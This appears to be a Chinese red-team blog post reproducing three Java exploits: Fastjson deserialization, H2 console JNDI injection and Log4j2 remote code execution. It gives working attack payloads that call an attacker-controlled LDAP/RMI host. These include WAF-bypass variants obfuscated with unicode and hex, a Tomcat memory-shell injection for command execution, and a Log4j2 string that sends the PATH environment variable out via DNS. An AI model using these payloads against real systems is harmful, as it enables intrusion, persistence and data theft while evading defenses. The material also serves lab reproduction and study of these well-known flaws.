红队打点-java 漏洞(二)
前言
实际打点过程中遇到大量java网站,对遇到的相关漏洞进行复现和整理。
Fastjson 反序列化
漏洞简介
Fastjson 是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean 序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
漏洞复现
参考诺言师傅的 Fastjson反序列化漏洞利用,下载Fatjson 1.2.24版本的war包部署在tomcat下即可。
image.png
复现时需要注意rmi、ldap协议对jdk版本的影响。
基于rmi的利用方式
适用jdk版本为:JDK 6u141、JDK 7u131、JDK 8u121之前。
在jdk8u122时,加入了反序列化白名单的机制,关闭了rmi远程加载代码。
基于ldap的利用方式
适用jdk版本为:JDK 11.0.1、JDK 8u182、JDK 7u191、JDK 6u201之前。
在Java 8u191时,Oracle发布了CVE-2018-3149,关闭了JNDI远程类加载。
可以看到ldap的利用范围是比rmi更大,推荐使用ldap方法。
指纹
使用pmiaowu师傅开发的被动式扫描插件 https://github.com/pmiaowu/BurpFastJsonScan
利用方式
推荐https://github.com/Mr-xn/JNDIExploit-1 工具
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.0.101
在jdk-8u172 版本下,可以成功利用。
{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.0.101:1389/Basic/Command/calc.exe","autoCommit":true}}
服务端:
image.png
也可以以回显的方式执行命令。
ldap://192.168.0.101:1389/Basic/TomcatEcho
image.png
注入内存马
ldap://192.168.0.101:1389/basic/TomcatMemshell2
image.png
访问内存马
http://10.211.55.5:8080/fastjson/anything?type=basic&pass=ipconfig
image.png
在jdk-8u261版本下,无法利用。
image.png
补充绕过WAF方式
{"e":{"\u0040\u0074\u0079\u0070\u0065":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","d_a_t_a_S_o_u-r-c-eName":"ldap://192.168.0.101:1389/Basic/TomcatEcho","autoCommit":true}}
{"e":{"\u0040\u0074\u0079\u0070\u0065":"java.lang.Class","val":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c"},"f":{"\u0040\u0074\u0079\u0070\u0065":"\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x72\x6f\x77\x73\x65\x74\x2e\x4a\x64\x62\x63\x52\x6f\x77\x53\x65\x74\x49\x6d\x70\x6c","d_a_t_a_S_o_u-r-c-eName":"ldap://192.168.0.101:1389/Basic/TomcatEcho","autoCommit":true}}
H2 Database JNDI注入
漏洞简介
H2 database 是H2数据库自带的一个Web管理页面,如果配置了允许外部用户访问Web管理页面,我们就可以页面进行JNDI注入攻击。
漏洞复现
使用windows系统搭建h2数据库,下载安装h2数据库并解压运行。此时会在用户目录产生.h2.server.properties 文件,修改配置文件为允许远程访问即可。
webAllowOthers=true
也可以结合spring 框架使用。
image.png
指纹
title="h2 console"
利用方式
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping -c 1 oms98d.dnslog.cn" -A 10.91.214.62
image.png
在Driver Class处填写:javax.naming.InitialContext 为JNDI 的工厂类,
在JDBC URL处填写: rmi://10.91.214.62:1099/zbt5cb 以上poc的其中一个。
点击connect连接测试,就可以成功收到dnslog。
image.png
也可以利用https://github.com/Mr-xn/JNDIExploit-1,执行系统命令。
image.png
同样是因为java版本问题导致某些poc无法利用成功。
Log4J2 远程代码执行
漏洞简介
Apache Log4j2 是一个基于Java的日志记录库。由于Log4j2内部实现JNDI(Java Naming and Directory Interface)协议,可通过注入JNDI脚本到客户端就能访问到LDAP服务端,LDAP服务端来实现远程代码执行。且只对error方法有效。
漏洞复现
使用IDEA创建maven项目,安装Log4J2 依赖。
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.1</version>
</dependency>
编写测试代码
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class AppTest
{
private static final Logger logger = LogManager.getLogger();
public static void main(String[] args) {
logger.error("This is error message.");
}
}
而Log4J2 支持这种表达式。
logger.error("${date:YYYY-MM-dd}");
logger.error("${java:os}");
logger.error("${env:PATH}");
image.png
恰恰该漏洞正是因为可以在错误日志中注入jndi协议导致的。
指纹
推荐 https://github.com/whwlsfb/Log4j2Scan 插件
利用方式
以vulfocus 环境为例
# 拉取漏洞环境
docker pull vulfocus/log4j2-rce-2021-12-09:latest
# 启动环境,将访问端口映射到本地8080端口
docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest
访问8080端口
image.png
使用dnslog测试log4J2漏洞
${jndi:dns://${env:PATH}.orznei.tencentnews.online}
url 编码后发送
image.png
证明存在该漏洞。
同样使用https://github.com/Mr-xn/JNDIExploit-1 工具,作为选择exp。
${jndi:ldap://192.168.0.101:1389/TomcatBypass/TomcatEcho}
url 编码后发送
image.png
可成功执行系统命令。
总结
复现了fastjson反序列化、H2 Database JNDI注入、Log4J2命令执行三个不同的漏洞,进一步熟悉了jndi的利用方式。
